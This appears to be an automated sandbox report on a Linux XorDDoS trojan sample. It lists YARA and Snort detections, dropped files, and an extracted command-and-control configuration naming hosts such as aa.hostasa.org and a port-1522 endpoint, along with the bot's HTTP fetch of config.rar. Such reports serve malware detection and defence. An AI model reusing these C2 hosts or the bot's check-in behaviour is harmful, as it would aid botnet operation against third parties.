Process Memory Space: iJl2Sb6qRa PID: 10027	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2bce:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2c8f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 10038	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 10038	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4267:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4328:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 10049	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 10049	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2806:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x28c7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: iJl2Sb6qRa PID: 10060	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: iJl2Sb6qRa PID: 10060	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1b4c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1c0d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 441 entries

Snort Signatures

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.20 - Destination IP: 54.36.145.106

Timestamp:	192.168.2.2054.36.145.1064643415222020381 04/04/23-19:53:10.224062
SID:	2020381
Source Port:	46434
Destination Port:	1522
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) - Source IP: 192.168.2.20 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.208.8.8.859877532021326 04/04/23-19:53:10.082524
SID:	2021326
Source Port:	59877
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN DDoS.XOR Checkin via HTTP - Source IP: 192.168.2.20 - Destination IP: 199.59.243.223

Timestamp:	192.168.2.20199.59.243.22355892802021336 04/04/23-19:53:10.133352
SID:	2021336
Source Port:	55892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: iJl2Sb6qRa	ReversingLabs: Detection: 67%
Source: iJl2Sb6qRa	Virustotal: Detection: 66%			Perma Link

Antivirus detection for dropped file

Source: /usr/bin/emnaztxelb

Avira: detection malicious, Label: LINUX/Xorddos.ygevo

Machine Learning detection for dropped file

Source: /usr/bin/wzhmvohlxs	Joe Sandbox ML: detected
Source: /usr/bin/cjfywultqo	Joe Sandbox ML: detected
Source: /usr/bin/emnaztxelb	Joe Sandbox ML: detected
Source: /usr/bin/zbksjhrfms	Joe Sandbox ML: detected
Source: /usr/bin/mhvrcmaysv	Joe Sandbox ML: detected
Source: /lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/wdcujvrbpo	Joe Sandbox ML: detected
Source: /usr/bin/eoqlmyvucn	Joe Sandbox ML: detected
Source: /usr/bin/dezqblvxuy	Joe Sandbox ML: detected
Source: /usr/bin/hgfzmygnbx	Joe Sandbox ML: detected
Source: /usr/bin/hiueshutol	Joe Sandbox ML: detected
Source: /usr/bin/chdmwyeiia	Joe Sandbox ML: detected
Source: /usr/bin/lnmgbribvb	Joe Sandbox ML: detected
Source: /usr/bin/ckxgqrmzxa	Joe Sandbox ML: detected
Source: /usr/bin/lsodknzpps	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: iJl2Sb6qRa

Joe Sandbox ML: detected

Source: iJl2Sb6qRa

Malware Configuration Extractor: XorDDoS {"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}

Source: /tmp/iJl2Sb6qRa (PID: 9452)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2021326 ET TROJAN Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) 192.168.2.20:59877 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.20:55892 -> 199.59.243.223:80
Source: Traffic	Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.20:46434 -> 54.36.145.106:1522

Source: global traffic

TCP traffic: 192.168.2.20:46434 -> 54.36.145.106:1522

Source: iJl2Sb6qRa, 9451.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9454.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9457.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9462.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9552.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9563.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9574.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9585.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9596.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9607.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9618.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9629.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9640.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9651.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9662.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9673.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9684.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9695.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9706.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9717.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9728.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp	String found in binary or memory: http://aa.hostasa.org/config.rar
Source: iJl2Sb6qRa, 9451.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9454.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9457.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9462.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9552.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9563.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9574.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9585.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9596.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9607.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9618.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9629.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9640.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9651.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9662.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9673.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9684.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9695.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9706.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9717.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9728.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp	String found in binary or memory: http://aa.hostasa.org/config.rartat456.com:1522
Source: iJl2Sb6qRa, wzhmvohlxs.7.dr, cjfywultqo.7.dr, zbksjhrfms.7.dr, mhvrcmaysv.7.dr, libudev.so.7.dr, wdcujvrbpo.7.dr, eoqlmyvucn.7.dr, dezqblvxuy.7.dr, hgfzmygnbx.7.dr, hiueshutol.7.dr, chdmwyeiia.7.dr, lnmgbribvb.7.dr, ckxgqrmzxa.7.dr, lsodknzpps.7.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html
Source: iJl2Sb6qRa, 9552.1.0000000008e7b000.0000000008e9c000.rw-.sdmp, iJl2Sb6qRa, 9563.1.0000000008e7b000.0000000008e9c000.rw-.sdmp	String found in binary or memory: https://www.google.com

Source: unknown

DNS traffic detected: queries for: aa.hostasa.org

Source: global traffic

HTTP traffic detected: GET /config.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: aa.hostasa.orgConnection: Keep-Alive

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: iJl2Sb6qRa, type: SAMPLE
Source: Yara match	File source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9451, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9454, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9462, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9563, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9574, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9585, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9607, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9618, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9629, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9651, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9662, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9673, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9695, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9706, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9717, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9739, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9750, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9761, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTR
Source: Yara match	File source: /lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/wzhmvohlxs, type: DROPPED
Source: Yara match	File source: /usr/bin/hiueshutol, type: DROPPED
Source: Yara match	File source: /usr/bin/mhvrcmaysv, type: DROPPED
Source: Yara match	File source: /usr/bin/lnmgbribvb, type: DROPPED
Source: Yara match	File source: /usr/bin/hgfzmygnbx, type: DROPPED
Source: Yara match	File source: /usr/bin/wdcujvrbpo, type: DROPPED
Source: Yara match	File source: /usr/bin/dezqblvxuy, type: DROPPED
Source: Yara match	File source: /usr/bin/chdmwyeiia, type: DROPPED
Source: Yara match	File source: /usr/bin/ckxgqrmzxa, type: DROPPED
Source: Yara match	File source: /usr/bin/lsodknzpps, type: DROPPED
Source: Yara match	File source: /usr/bin/eoqlmyvucn, type: DROPPED
Source: Yara match	File source: /usr/bin/cjfywultqo, type: DROPPED
Source: Yara match	File source: /usr/bin/zbksjhrfms, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: iJl2Sb6qRa, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: iJl2Sb6qRa, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: iJl2Sb6qRa, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
